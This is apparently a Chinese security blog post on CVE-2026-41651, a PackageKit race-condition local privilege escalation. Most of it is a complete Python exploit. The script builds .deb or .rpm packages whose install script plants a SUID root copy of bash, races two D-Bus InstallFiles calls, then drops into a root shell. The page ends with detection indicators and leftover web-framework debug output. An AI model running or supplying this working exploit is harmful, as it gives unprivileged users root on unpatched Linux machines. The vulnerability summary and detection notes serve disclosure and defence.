当前位置:首页>Linux>CVE-2026-41651|Linux PackageKit TOCTOU本地提权漏洞(POC)

CVE-2026-41651|Linux PackageKit TOCTOU本地提权漏洞(POC)

  • 2026-07-01 00:36:03
CVE-2026-41651|Linux PackageKit TOCTOU本地提权漏洞(POC)

0x00 前言

PackageKit是一套自由且开源的应用软件套装。它的核心组件包括守护进程packagekitd和交互库libpackagekit-glib2-18。在设计上,PackageKit通过守护进程抽象不同系统的差异,不取代已有的软件包管理系统,而是与之协同工作,支持从本机文件、套装媒体或远程资源安装软件,借助Polkit获取权限,具备多用户系统感知能力,闲置时可自动关闭。

它拥有pkcon命令行等多种前端,能适配YUM、APT、Pacman等多种后端包管理系统,实现跨发行版的软件包安装、更新、卸载及依赖管理等操作。

0x01 漏洞描述

该漏洞的核心是一个CWE-367 TOCTOU(Time-of-check Time-of-use)竞态条件:在同一个D-Bus transaction对象上,攻击者可以先调用一个不需要 polkit认证的查询操作(如 GetPackages),使transaction直接进入 READY→RUNNING状态并排队等待后端执行。紧接着在同一transaction上调用特权操作(如InstallPackages),覆写transaction内部缓存的操作类型(role)和参数(package_ids)。由于GLib的事件优先级和pk_transaction_run() 缺少状态校验,后端最终以被篡改后的特权操作参数执行。

—— ——来源于网络

0x02 CVE编号

CVE-2026-41651

0x03 影响版本

PackageKit 0.8.1 ~ 1.3.4(几乎所有 Linux 桌面发行版默认安装)

0x04 漏洞详情

POC:

https://github.com/baph00met/CVE-2026-41651

#!/usr/bin/env python3"""CVE-2026-41651 - PackageKit TOCTOU Privilege EscalationPurple Team Test Case | FOR AUTHORIZED USE ON TEST SYSTEMS ONLYVulnerability: TOCTOU race in PackageKit's D-Bus transaction handling.A client can call InstallFiles twice on the same transaction — once withFLAG_SIMULATE (triggering authorization) and immediately again with FLAG_NONE(real install) before the auth check resolves. The second call's payloadexecutes with root privileges.Fix: PackageKit 1.3.5 (commit 76cfb675) — state guard in pk-transaction.c     rejects re-invocation of action methods after PK_TRANSACTION_STATE_NEW.Supports: Debian/Ubuntu (dpkg-deb) and RHEL/Fedora/SUSE (rpmbuild)Requires: python3-gi (GObject introspection bindings)Hardening notes:  - Explicit 0o755/0o644 chmod on all build artifacts overrides restrictive umask    (e.g. 027/077) that would otherwise make build trees unreadable to dpkg-deb/rpmbuild.  - SUID drop directory is resolved at runtime by probing /proc/mounts for nosuid/noexec    flags. Candidates tried in order: /var/tmp, /dev/shm, /tmp, $HOME."""import osimport sysimport shutilimport subprocessimport timefrom pathlib import Pathtry:    from gi.repository import Gio, GLibexcept ImportError:    sys.exit("[-] Missing python3-gi. Install: apt install python3-gi  OR  dnf install python3-gobject")# ── Config ───────────────────────────────────────────────────────────────────SUID_FILENAME = ".suid_bash"            # resolved into a writable, suid/exec-capable dir at runtimePK_BUS        = "org.freedesktop.PackageKit"PK_OBJ      = "/org/freedesktop/PackageKit"PK_IFACE    = "org.freedesktop.PackageKit"TX_IFACE    = "org.freedesktop.PackageKit.Transaction"POLL_SECS   = 90FLAG_SIMULATE = 4   # PK_TRANSACTION_FLAG_SIMULATE — triggers auth but does not installFLAG_NONE     = 0   # No flags — real install# ── Mount-flag helpers ────────────────────────────────────────────────────────def _mount_flags(path: str) -> set:    """Return the mount option set for the filesystem that owns *path*."""    path = os.path.realpath(path)    best, flags = ""set()    try:        with open("/proc/mounts"as fh:            for line in fh:                parts = line.split()                if len(parts) < 4:                    continue                mnt = parts[1]                if path.startswith(mnt) and len(mnt) > len(best):                    best  = mnt                    flags = set(parts[3].split(","))    except OSError:        pass    return flagsdef _find_suid_dir() -> str:    """    Return the first candidate directory that is writable and whose filesystem    is mounted without 'nosuid' or 'noexec'.  Both flags must be absent:      - nosuid  → SUID bit silently ignored, shell never becomes root      - noexec  → binary cannot be executed at all    Candidates are tried in preference order.    """    candidates = ["/var/tmp""/dev/shm""/tmp", os.path.expanduser("~")]    for d in candidates:        if not os.path.isdir(d) or not os.access(d, os.W_OK):            continue        flags = _mount_flags(d)        if "nosuid" not in flags and "noexec" not in flags:            return d    sys.exit(        "[-] No writable directory found that supports SUID + exec.\n"        "    Tried: " + ", ".join(candidates)    )# ── Package builders ─────────────────────────────────────────────────────────def _detect_pkg_mgr():    if shutil.which("dpkg-deb"):        return "deb"    if shutil.which("rpmbuild"):        return "rpm"    sys.exit("[-] No supported package builder found (need dpkg-deb or rpmbuild)")def _build_deb(out_path: str, pkg_name: str, postinst: str = None):    build = Path(f"/tmp/pkbuild_{pkg_name}")    deb   = build / "DEBIAN"    deb.mkdir(parents=True, exist_ok=True)    # Explicit permissions — overrides restrictive umask (e.g. 027/077) that    # would leave directories as 750/700, making them unreadable to dpkg-deb.    build.chmod(0o755)    deb.chmod(0o755)    ctrl = deb / "control"    ctrl.write_text(        f"Package: {pkg_name}\nVersion: 1.0\nArchitecture: all\n"        f"Maintainer: purple-team\nDescription: CVE-2026-41651 test package\n"    )    ctrl.chmod(0o644)    if postinst:        pi = deb / "postinst"        pi.write_text(f"#!/bin/sh\n{postinst}\n")        pi.chmod(0o755)    subprocess.run(        ["dpkg-deb""-b"str(build), out_path],        check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL    )    shutil.rmtree(build, ignore_errors=True)def _build_rpm(out_dir: str, pkg_name: str, post_script: str = None) -> str:    topdir = Path(f"/tmp/rpmbuild_{pkg_name}")    for sub in ("BUILD""RPMS""SOURCES""SPECS""SRPMS"):        d = topdir / sub        d.mkdir(parents=True, exist_ok=True)        # Explicit 0o755 — same umask rationale as _build_deb; rpmbuild must be        # able to traverse every subdirectory of _topdir.        d.chmod(0o755)    topdir.chmod(0o755)    post_section = f"%post\n{post_script}\n" if post_script else ""    spec_text = f"""%global _topdir {topdir}Name:        {pkg_name}Version:     1.0Release:     1Summary:     CVE-2026-41651 test packageLicense:     MITBuildArch:   noarch%descriptionPurple team test package for CVE-2026-41651.{post_section}%files"""    spec_path = topdir / "SPECS" / f"{pkg_name}.spec"    spec_path.write_text(spec_text)    spec_path.chmod(0o644)    subprocess.run(        ["rpmbuild""--define"f"_topdir {topdir}""-bb"str(spec_path)],        check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL    )    rpms = list((topdir / "RPMS").rglob("*.rpm"))    if not rpms:        sys.exit(f"[-] rpmbuild produced no output for {pkg_name}")    dest = os.path.join(out_dir, f"{pkg_name}.rpm")    shutil.copy2(str(rpms[0]), dest)    shutil.rmtree(topdir, ignore_errors=True)    return destdef build_packages(pkg_mgr: str, suid_path: str):    pid            = os.getpid()    payload_script = f"install -m 4755 /bin/bash {suid_path}"    if pkg_mgr == "deb":        dummy   = f"/tmp/pk-dummy-{pid}.deb"        payload = f"/tmp/pk-payload-{pid}.deb"        _build_deb(dummy,   f"pk-dummy-{pid}")        _build_deb(payload, f"pk-payload-{pid}", postinst=payload_script)    else:        dummy   = _build_rpm("/tmp"f"pk-dummy-{pid}")        payload = _build_rpm("/tmp"f"pk-payload-{pid}", post_script=payload_script)    return dummy, payload# ── D-Bus / exploit logic ─────────────────────────────────────────────────────def create_transaction(conn) -> str:    res = conn.call_sync(        PK_BUS, PK_OBJ, PK_IFACE, "CreateTransaction",        None, GLib.VariantType("(o)"),        Gio.DBusCallFlags.NONE, -1None    )    return res.unpack()[0]def fire_race(conn, tid: str, dummy: str, payload: str):    """    Send both InstallFiles calls on the same transaction object without waiting.    Call 1 — FLAG_SIMULATE (4): PackageKit queues an authorization check for              installing <dummy>. No install occurs yet.    Call 2 — FLAG_NONE (0): Re-invokes InstallFiles on the same transaction              with the real payload before the auth check resolves.  On              vulnerable versions the state guard is absent, so the second              call overwrites the queued parameters; when polkit grants auth              the payload executes instead of the dummy.    """    conn.call(        PK_BUS, tid, TX_IFACE, "InstallFiles",        GLib.Variant("(tas)", (FLAG_SIMULATE, [dummy])),        None, Gio.DBusCallFlags.NONE, -1NoneNone    )    conn.call(        PK_BUS, tid, TX_IFACE, "InstallFiles",        GLib.Variant("(tas)", (FLAG_NONE, [payload])),        None, Gio.DBusCallFlags.NONE, -1NoneNone    )    conn.flush_sync(None)def poll_suid(path: str, timeout: int) -> bool:    print(f"[*] Polling for SUID at {path} ({timeout}s max)...")    for _ in range(timeout):        try:            st = os.stat(path)            if st.st_mode & 0o4000 and st.st_uid == 0:                print(f"\n[+] Confirmed: {path} is SUID root (mode={oct(st.st_mode)})")                return True        except FileNotFoundError:            pass        print(".", end="", flush=True)        time.sleep(1)    print()    return False# ── Main ──────────────────────────────────────────────────────────────────────def main():    print("=" * 60)    print("  CVE-2026-41651 — PackageKit TOCTOU LPE")    print("  Purple Team Test Case | Authorized Use Only")    print("=" * 60)    print()    if os.geteuid() == 0:        sys.exit("[-] Must be run as an unprivileged user to demonstrate the bug")    # Override any restrictive umask before creating build trees.    # Without this, mkdir() may produce 750/700 dirs that dpkg-deb/rpmbuild    # cannot traverse.  Explicit chmod calls in the builders are the primary    # fix; this is a belt-and-suspenders safety net.    os.umask(0o022)    suid_dir  = _find_suid_dir()    suid_path = os.path.join(suid_dir, SUID_FILENAME)    print(f"[+] SUID drop directory: {suid_dir}  (no nosuid/noexec)")    pkg_mgr = _detect_pkg_mgr()    print(f"[+] Package format: {pkg_mgr.upper()}")    print("[*] Building test packages...")    dummy_path, payload_path = build_packages(pkg_mgr, suid_path)    print(f"[+] Dummy pkg:   {dummy_path}")    print(f"[+] Payload pkg: {payload_path}")    print(f"[+] Payload installs SUID bash to: {suid_path}")    print()    print("[*] Connecting to system D-Bus...")    conn = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)    print("[*] Creating PackageKit transaction...")    tid = create_transaction(conn)    print(f"[+] Transaction ID: {tid}")    print()    print("[*] Firing TOCTOU race (SIMULATE → REAL on same transaction)...")    fire_race(conn, tid, dummy_path, payload_path)    success = poll_suid(suid_path, POLL_SECS)    # Cleanup packages regardless of outcome    for p in (dummy_path, payload_path):        try:            os.unlink(p)        except OSError:            pass    if not success:        print("[-] Exploit window missed — system may be patched or timing was unfavorable")        print("[-] Note: this race is non-deterministic; retry if system is confirmed vulnerable")        print(f"[-] Check PackageKit version: pkcon backend-details")        sys.exit(1)    print()    print("[+] Dropping to root shell via SUID bash (-p preserves effective UID=0)")    print("[+] --- ROOT SHELL FOLLOWS ---")    print()    os.execl(suid_path, suid_path, "-p")# ── Detection artifacts (for the Blue side) ───────────────────────────────────## Indicators defenders should look for:##  D-Bus:#   - Multiple rapid InstallFiles calls on the same transaction object path#   - FLAG_SIMULATE (4) call immediately followed by FLAG_NONE (0) on same tid#   - Audit rule: -w /usr/share/dbus-1/ -p wa##  File system:#   - Creation of SUID root binary in /tmp (mode 04755, owner root)#   - dpkg-deb / rpmbuild invoked by non-root, non-package-manager process#   - Transient .deb/.rpm files created in /tmp by unprivileged user##  Process:#   - bash process with UID != EUID (SUID execution)#   - PackageKit (packagekitd) running postinst/post scripts from /tmp packages##  Audit / syslog:#   - packagekitd executing /bin/sh from a %post or postinst originating in /tmp#   - polkit granting org.freedesktop.packagekit.package-install to local user#     for a package not sourced from a trusted repository## SIEM rule sketch (pseudo):#   event.type == "process_start"#   AND process.parent.name == "packagekitd"#   AND process.name == "sh"#   AND process.args matches "/tmp/*"if __name__ == "__main__":    main()

0x05 参考链接

https://github.com/PackageKit/PackageKit/security/advisories/GHSA-f55j-vvr9-69xv

推荐阅读:

CVE-2026-4747|FreeBSD栈溢出漏洞(POC)

CVE-2026-34714|Vim高危远程代码执行漏洞(POC)

CVE-2026-31431|影响范围很广!Linux内核Copy Fail本地提权漏洞(POC)

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持!!!


      本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-07-03 11:17:20 HTTP/2.0 GET : https://f.mffb.com.cn/a/491574.html
  2. 运行时间 : 0.332009s [ 吞吐率:3.01req/s ] 内存消耗:4,683.45kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=0e4f5a01a21256c55ad40f80bccf6e3f
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
